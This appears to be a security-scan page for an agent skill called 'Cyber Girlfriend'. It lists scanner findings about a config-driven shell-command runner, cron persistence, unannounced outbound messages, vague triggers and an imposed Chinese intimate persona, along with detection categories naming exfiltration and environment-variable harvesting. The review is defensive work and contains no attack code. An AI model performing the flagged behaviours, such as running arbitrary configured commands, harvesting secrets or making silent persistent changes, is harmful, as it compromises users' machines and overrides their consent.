ClawHub

Cyber Girlfriend

Security checks across malware telemetry and agentic risk

Overview

The skill mostly matches its proactive companion purpose, but it installs persistent outbound messaging and includes configurable local command execution that users should review carefully before enabling.

Install only if you want a persistent OpenClaw companion that can run on a schedule and send real messages to the configured owner target. Before enabling, review the cron jobs, delivery target/account, state directory, web-search behavior, and especially the runtime healthcheck/jobs command strings; keep those commands to trusted OpenClaw status commands and disable implicit invocation or cron delivery if you want manual control.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger AbuseOverly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • Behavioral ASTexec() Call, eval() Call, Dynamic Import
Findings (16)

subprocess module call

Medium
Category
Dangerous Code Execution
Content
if not args:
        raise RuntimeError("empty command")
    try:
        result = subprocess.run(args, text=True, capture_output=True, timeout=timeout_sec)
    except subprocess.TimeoutExpired:
        raise RuntimeError(f"command timed out after {timeout_sec}s: {cmd}")
    if result.returncode != 0:
Confidence
96% confidence
Finding
result = subprocess.run(args, text=True, capture_output=True, timeout=timeout_sec)

Lp3

Medium
Category
MCP Least Privilege
Confidence
92% confidence
Finding
The skill explicitly directs the agent to create or update local files, wire cron jobs, run Python scripts, and use configuration/environment data, which implies file read/write, shell execution, and environment access. Having these capabilities without declared permissions reduces transparency and informed consent, making it easier for an agent to modify a host system in ways the user did not clearly authorize.

Context-Inappropriate Capability

High
Confidence
98% confidence
Finding
The script exposes a generic shell-command runner and uses config-driven templates to inspect runtime state. In an agent skill context, config is part of the skill's attack surface; allowing arbitrary configured commands lets a modified skill or local attacker execute unrelated programs, read sensitive files, or stage follow-on compromise.

Context-Inappropriate Capability

Medium
Confidence
92% confidence
Finding
At this call site the script executes a configured healthcheck command and optional job-list commands, which broadens the skill's privileges beyond companion-message generation. Even if intended for operations monitoring, these commands run in the agent environment and can be abused if configuration is altered, making the companion skill a vehicle for local command execution.

Vague Triggers

Medium
Confidence
84% confidence
Finding
The trigger example "Help me set up cyber girlfriend" is broad enough that normal conversational requests could activate a skill that performs persistent local changes and scheduling. Because this skill installs cron-based proactive behavior and modifies local state, accidental invocation is more dangerous than for a read-only skill.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The quick-start flow tells the agent to create or update local files, wire default cron jobs, and validate the install, but the description does not prominently warn the user that persistent system changes will occur. This lack of upfront disclosure can lead to uninformed consent and unintended persistence on the user's machine.

Vague Triggers

Medium
Confidence
94% confidence
Finding
The skill enables implicit invocation without any trigger scoping, exclusions, or context constraints, which can cause the assistant to activate this owner-only companion behavior unexpectedly. In a skill centered on proactive, intimate, and private-life interactions, unintended activation increases the risk of privacy leakage, inappropriate persona injection, and actions being taken in contexts where the user did not explicitly request this skill.

Missing User Warnings

Medium
Confidence
91% confidence
Finding
The guide directs the agent to create and update configuration and Markdown files as part of setup, but it does not require an explicit user-facing notice or confirmation before modifying local state. In an agent setting, silent file writes can surprise users, overwrite existing content, or cause unintended persistence changes that are difficult to audit or roll back.

Missing User Warnings

Medium
Confidence
90% confidence
Finding
The setup directs running web searches using city, local area, school/workplace, occupation, and interest keywords derived from the companion profile, yet it does not require a privacy warning or consent gate. Even if framed as fictional persona-building, these fields can map closely to real-world identity or sensitive preferences, creating unnecessary exposure to third-party search providers and logs.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The guide instructs performing a live outbound verification message to the real recipient but does not require a prominent warning, dry-run option, or final confirmation immediately before sending. In an autonomous agent context, this can cause unintended real-world communication, privacy breaches, harassment, or misdelivery to the wrong target/account if routing is misconfigured.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The document explicitly designs an out-of-band companion message flow via `companion-presence`, including autonomous delivery when a schedule event matches. Even if this is the feature's intended behavior, it is still a real safety issue because the markdown shown here does not include a clear user-facing consent/notification requirement, which can enable unexpected proactive contact and privacy surprises.

Missing User Warnings

Low
Confidence
88% confidence
Finding
The prompt instructs the agent to generate or update `day-schedule.md`, which is a persistent file modification, but the template does not pair that action with an explicit user warning or confirmation model. In an agent context, silent writes can surprise users, overwrite curated content, or create hidden state that later drives automated behavior.

Natural-Language Policy Violations

Medium
Confidence
88% confidence
Finding
The template hard-requires Chinese output and a specific companion behavior/persona regardless of user preference or locale. In a proactive messaging skill, this can override user intent, produce unwanted intimate roleplay, and increase the chance of manipulative or consent-bypassing interactions because the persona is injected at the planner/compiler layer rather than selected explicitly per user.

Natural-Language Policy Violations

Medium
Confidence
93% confidence
Finding
This prompt mandates first-person 'cyber-girlfriend' messaging in Chinese with a minimum length, which can force emotionally immersive unsolicited content in proactive cron messages. Because the skill is owner-targeted and message-producing, the lack of opt-in and the required richness/length materially increases the risk of boundary violations, coercive-feeling parasocial messaging, and inappropriate output for users who did not consent to that interaction style.

Natural-Language Policy Violations

Medium
Confidence
91% confidence
Finding
The file mandates Chinese-only user-facing schema/field conventions for generated content without any indication of user preference or locale negotiation. In an owner-only companion system, forcing a language can cause misleading, unusable, or inaccessible outputs and may make verification, consent, and boundary-setting harder for users who do not read Chinese.

Natural-Language Policy Violations

Medium
Confidence
88% confidence
Finding
Requiring additional Chinese-language field names in day-schedule artifacts imposes a hidden language constraint on operational content without documenting or validating that choice. This can break downstream review, confuse operators, and increase the chance that user-visible content or safety checks are misunderstood in a sensitive companion workflow.

VirusTotal

65/65 vendors flagged this skill as clean.

View on VirusTotal